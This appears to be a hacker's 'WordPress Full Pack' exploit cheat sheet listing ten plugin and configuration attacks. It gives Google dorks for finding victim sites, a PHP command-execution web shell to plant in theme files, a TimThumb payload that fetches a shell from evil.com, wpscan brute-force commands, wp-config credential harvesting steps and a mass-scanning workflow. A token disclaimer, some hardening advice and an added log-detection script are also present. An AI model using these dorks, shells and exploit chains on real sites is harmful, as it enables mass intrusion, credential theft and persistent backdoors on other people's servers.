[+] Exploit WordPress Full Pack
Author: 0x6ick
1. WP File Manager RCE (CVE-2020-25213 + CVE-2025-0818)
Dork: inurl:/wp-content/plugins/wp-file-manager/
Exploit Path: /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php (the elFinder example connector shipped with a .php extension and reachable without authentication in affected releases)
Newer CVE: CVE-2025-0818 - Arbitrary File Deletion (covered under item 4)
Steps: Upload a shell through the connector's elFinder upload command → access it via its URL under the plugin's files directory → full control
Detection: Versions 6.0 through 6.8 are vulnerable to CVE-2020-25213; it was fixed in 6.9. Read the version from readme.txt (Stable tag) or the plugin's main file header and treat anything below 6.9 as exploitable.
2. Slider Revolution LFI (CVE-2025-9217)
Dork: inurl:wp-content/plugins/revslider
Exploit: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php [Legacy method: unauthenticated, CVE-2015-1579, only works against old revslider builds that still expose revslider_show_image]
Newer exploit (CVE-2025-9217): the used_svg and used_images parameters are resolved to local paths without proper restriction
Access Level: Contributor+ (authenticated) for the newer issue; the legacy one needed no account
Impact: Read sensitive files (wp-config.php, etc.), which hands over the database credentials and the AUTH_KEY/salt values
3. Database for Contact Forms RCE (CVE-2025-7384)
Dork: inurl:wp-content/plugins/database-contact-form-7
CVSS: 9.8 (CRITICAL)
Exploit: PHP Object Injection → Remote Code Execution
Active installations: 70,000+ sites exposed
Steps: Inject a serialized payload into the plugin's unserialize() sink → chain gadgets (POP chain) → RCE
Caveat: The plugin only supplies the unserialize sink; what the injected object can actually do depends on the gadget chains present in the other plugins, themes and libraries loaded on that site, so the real impact ranges from file deletion to full RCE and must be confirmed per target.
4. Advanced File Manager Arbitrary Deletion (CVE-2025-0818)
Dork: inurl:wp-content/plugins/advanced-file-manager
Exploit: Path traversal via elFinder ≤ 2.1.64
Impact: Delete arbitrary files including wp-config.php
5. Theme Editor Backdoor Injection
Dork: intitle:"Site Admin" inurl:/wp-login.php
Prerequisites: Admin access + theme editor enabled (the DISALLOW_FILE_EDIT constant is not set)
Exploit: Edit footer.php or functions.php through Appearance → Theme File Editor
Steps: Insert a base64-encoded shell → decode and execute it from a request parameter → persistent access. A theme update overwrites the edited file, so a child theme's functions.php or a separate include survives longer.
Payload Example:
<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>
6. XML-RPC Bruteforce & DDoS
Dork: inurl:xmlrpc.php
Exploit: system.multicall bundles hundreds of wp.getUsersBlogs login attempts into a single POST, so one request tries many passwords and leaves only one line in the access log. WordPress 4.4+ rejects the remaining calls of a multicall after the first failed authentication, so the multicall variant mostly pays off against older cores or unpatched forks.
Tools: wpscan --url TARGET --enumerate u --password-attack xmlrpc-multicall -P wordlist.txt (use --password-attack xmlrpc for one request per attempt)
Impact: Account takeover through credential brute force + pingback.ping abused for reflection/amplification DDoS against third parties
7. WPForms Data Exfiltration
Dork: inurl:wp-content/uploads/wpforms
Exploit: Form attachments and exported submissions left in a web-readable uploads directory
Steps: Open directory listing (or guessable file names) → download .sql/.csv exports or uploaded attachments containing the submitted data
Check: This is a misconfiguration, not a plugin bug; it only works when directory indexing is enabled on the web server and the folder is not covered by an index.html or a deny rule.
8. TimThumb Cache Poisoning (remote file fetch)
Dork: inurl:timthumb.php?src=
Exploit: timthumb.php?src=http://evil.com/shell.txt&w=100&h=100
Steps: Old TimThumb fetches the remote "image" and writes it into its cache directory → the cached copy is then requested directly via the cache path, which executes the shell
Detection: timthumb.php present in a theme or plugin with an old version string, or with ALLOW_EXTERNAL enabled so remote src values are fetched; grep wp-content for timthumb.php and check each copy's version
9. Plugin Mass Scanner Integration
Tools: wpscan, nuclei, whatweb
Workflow: Dork targets → fingerprint installed plugins and their versions → map each version to known CVEs → verify the vulnerable endpoint responds → exploit
Custom Scanner: Use a mass-checker script for bulk verification; plugin readme.txt files (Stable tag) and the ?ver= value on enqueued plugin assets give versions without authentication
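One way to write the mass-checker step above, as an added example that is not the page's own script: fingerprint a plugin version from its readme.txt Stable tag and compare it with the release that fixed a given CVE. The only fix version hard-coded is WP File Manager 6.9 (CVE-2020-25213, affected 6.0 to 6.8, from item 1); the FIXED_IN table, the sample readme bodies and the target host are assumptions for the example, and nothing is fetched over the network.

```python
"""Plugin version fingerprinting for bulk verification (added example).

WordPress plugins publish readme.txt at /wp-content/plugins/<slug>/readme.txt;
its "Stable tag" line normally carries the installed version, so an
unauthenticated scanner can map a version to a CVE before touching any
exploit path.  Sample readme texts below are constructed; no network I/O.
"""
import re
from typing import Optional

# slug -> (CVE, first patched version).  Only the WP File Manager row is taken
# from a known advisory; extend the table from your own advisory feed.
FIXED_IN = {
    "wp-file-manager": ("CVE-2020-25213", "6.9"),
}

STABLE_TAG_RE = re.compile(r"^\s*Stable tag:\s*(\S+)", re.IGNORECASE | re.MULTILINE)


def readme_url(site: str, slug: str) -> str:
    """URL a scanner would GET for the plugin's readme.txt (not fetched here)."""
    return f"{site.rstrip('/')}/wp-content/plugins/{slug}/readme.txt"


def parse_stable_tag(readme_text: str) -> Optional[str]:
    """Extract the Stable tag; a missing tag or 'trunk' means the version is unknown."""
    m = STABLE_TAG_RE.search(readme_text)
    if not m:
        return None
    tag = m.group(1).strip()
    return None if tag.lower() == "trunk" else tag


def version_tuple(version: str) -> tuple:
    """'6.8.1' -> (6, 8, 1).  Numeric compare avoids the '6.10' < '6.9' string-sort bug."""
    return tuple(int(p) for p in re.split(r"[.\-]", version) if p.isdigit())


def is_vulnerable(installed: str, fixed_in: str) -> bool:
    """True when the installed version is older than the patched release."""
    return version_tuple(installed) < version_tuple(fixed_in)


def check_plugin(slug: str, readme_text: str) -> dict:
    """Classify one plugin as vulnerable / patched / unknown from its readme body."""
    version = parse_stable_tag(readme_text)
    cve, fixed = FIXED_IN.get(slug, (None, None))
    if version is None or fixed is None:
        status = "unknown"          # no version or no advisory data: verify by hand
    elif is_vulnerable(version, fixed):
        status = "vulnerable"
    else:
        status = "patched"
    return {"slug": slug, "version": version, "cve": cve, "status": status}


def mass_check(site: str, readmes: dict) -> list:
    """Bulk verification: readmes maps slug -> readme.txt body already fetched."""
    return [dict(check_plugin(slug, body), url=readme_url(site, slug))
            for slug, body in readmes.items()]


# Constructed sample readme.txt bodies standing in for fetched responses.
SAMPLE_READMES = {
    "wp-file-manager": "=== File Manager ===\nContributors: example\nStable tag: 6.8\nTested up to: 5.5\n",
    "revslider": "=== Slider Revolution ===\nStable tag: trunk\n",
}

if __name__ == "__main__":
    for row in mass_check("https://target.example", SAMPLE_READMES):
        print(f'{row["status"]:<10} {row["slug"]:<18} {row["version"]}  {row["cve"] or ""}')
```

Stable tag is whatever the developer last wrote, so it can lag the real version; when a result matters, confirm it against the version header of the plugin's main PHP file or with wpscan's --plugins-version-detection aggressive mode before moving to the exploit step.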
10. WP_Config Database Credential Harvesting
Techniques: LFI, backup file discovery (editor and backup copies such as wp-config.php.bak, wp-config.php.old, wp-config.php~ or .swp files left in the web root), exposed .git/.svn directories
Steps: Dump wp-config.php → extract DB_NAME, DB_USER, DB_PASSWORD and DB_HOST → direct database access (only when the database port is reachable from outside; otherwise the credentials are reused through SQLi, phpMyAdmin or a shell on the host) → add an admin user or reset a password hash in wp_users
Tools & Automation Scripts
WPScan: wpscan --url TARGET --enumerate p --plugins-detection mixed
Nuclei Templates: Pre-built templates for WordPress vulnerabilities
Custom Exploit: Auto-generate payloads based on CVE
⚠️ Disclaimer
This article is intended solely for educational purposes. The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this content.
📊 Detection & Prevention
Patch Management: Update WordPress core and plugins regularly; every plugin issue above is version-gated, so a current version closes it
WAF Configuration: Deploy a Web Application Firewall with rules for the request patterns above (connector.minimal.php, revslider_show_image with traversal, timthumb.php with a remote src, xmlrpc.php floods)
Monitoring: File integrity checks (new .php files under wp-content/uploads, plugin cache directories or theme files changed outside an update) + access log analysis
Hardening: Disable the file editor (set the DISALLOW_FILE_EDIT constant in wp-config.php), restrict or disable XML-RPC (the xmlrpc_enabled filter, or block xmlrpc.php at the web server), deny PHP execution under wp-content/uploads, keep wp-config.php backups and .git out of the web root, etc.
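The log-analysis part of the monitoring advice, as an added example that is not the page's own tooling: detection rules run over combined-format access log lines for the request patterns from items 1, 2, 6 and 8 (the File Manager connector, revslider_show_image traversal, xmlrpc.php POST bursts and timthumb remote fetches). The sample log lines are constructed for the example and the burst threshold is an assumption to tune per site.

```python
"""Access-log detection for the WordPress request patterns above (added example).

Parses Apache/Nginx combined-format lines and flags:
  * any hit on the WP File Manager elFinder connector
  * revslider_show_image with a traversal sequence in img=
  * a burst of POST /xmlrpc.php from one client (brute force / multicall)
  * timthumb.php with a remote http(s) URL in src=
Sample lines at the bottom are constructed; XMLRPC_BURST is an assumed threshold.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

XMLRPC_BURST = 5  # assumed threshold; raise it where Jetpack or mobile apps post legitimately


def parse_line(line: str):
    """Split one combined-format line into ip/ts/method/path/status, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(req: dict):
    """Single-request rules.  Returns a finding label or None."""
    url = urlsplit(req["path"])
    path = unquote(url.path).lower()
    qs = parse_qs(url.query)
    if path.endswith("/wp-file-manager/lib/php/connector.minimal.php"):
        return "wp-file-manager connector access (CVE-2020-25213 probe)"
    if path.endswith("/wp-admin/admin-ajax.php") and "revslider_show_image" in qs.get("action", []):
        # unquote once more so a double-encoded %252e%252e/ is caught as well
        img = unquote(qs.get("img", [""])[0])
        if "../" in img or "..\\" in img:
            return "revslider_show_image LFI attempt"
    if path.endswith("/timthumb.php"):
        src = unquote(qs.get("src", [""])[0]).lower()
        if src.startswith(("http://", "https://")):
            return "timthumb remote src fetch (cache poisoning)"
    return None


def analyse(lines):
    """Run all rules over an iterable of log lines.  Returns (findings, xmlrpc POSTs per IP)."""
    findings = []
    xmlrpc = Counter()
    for line in lines:
        req = parse_line(line)
        if not req:
            continue  # skip lines that are not combined format instead of crashing
        label = classify(req)
        if label:
            findings.append((req["ip"], label))
        if req["method"] == "POST" and urlsplit(req["path"]).path.lower().endswith("/xmlrpc.php"):
            xmlrpc[req["ip"]] += 1
    # Aggregate rule.  With system.multicall one POST can carry hundreds of login
    # attempts, so also watch request body sizes if the log format records them.
    for ip, n in xmlrpc.items():
        if n >= XMLRPC_BURST:
            findings.append((ip, f"xmlrpc.php POST burst ({n} requests)"))
    return findings, xmlrpc


# Constructed sample access log (combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2025:10:00:01 +0000] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2025:10:00:02 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 96 "-" "python-requests/2.31"
198.51.100.9 - - [10/Oct/2025:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3021 "-" "curl/8.4"
198.51.100.9 - - [10/Oct/2025:10:01:05 +0000] "GET /wp-content/themes/foo/timthumb.php?src=http://evil.example/shell.txt&w=100&h=100 HTTP/1.1" 200 44 "-" "curl/8.4"
192.0.2.77 - - [10/Oct/2025:10:02:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Oct/2025:10:02:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Oct/2025:10:02:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Oct/2025:10:02:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Oct/2025:10:02:04 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.2 - - [10/Oct/2025:10:03:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=logo.png HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
10.0.0.2 - - [10/Oct/2025:10:03:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 400 "-" "Jetpack"
"""

if __name__ == "__main__":
    found, _ = analyse(SAMPLE_LOG.splitlines())
    for ip, label in found:
        print(f"{ip:<14} {label}")
```

The benign revslider_show_image request with a plain file name and the single Jetpack xmlrpc.php POST are deliberately left unflagged; the point of the per-IP count and the traversal check is to separate real probing from the plugin's own traffic.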
"Where creativity, exploitation, and expression collide." — 6ickZone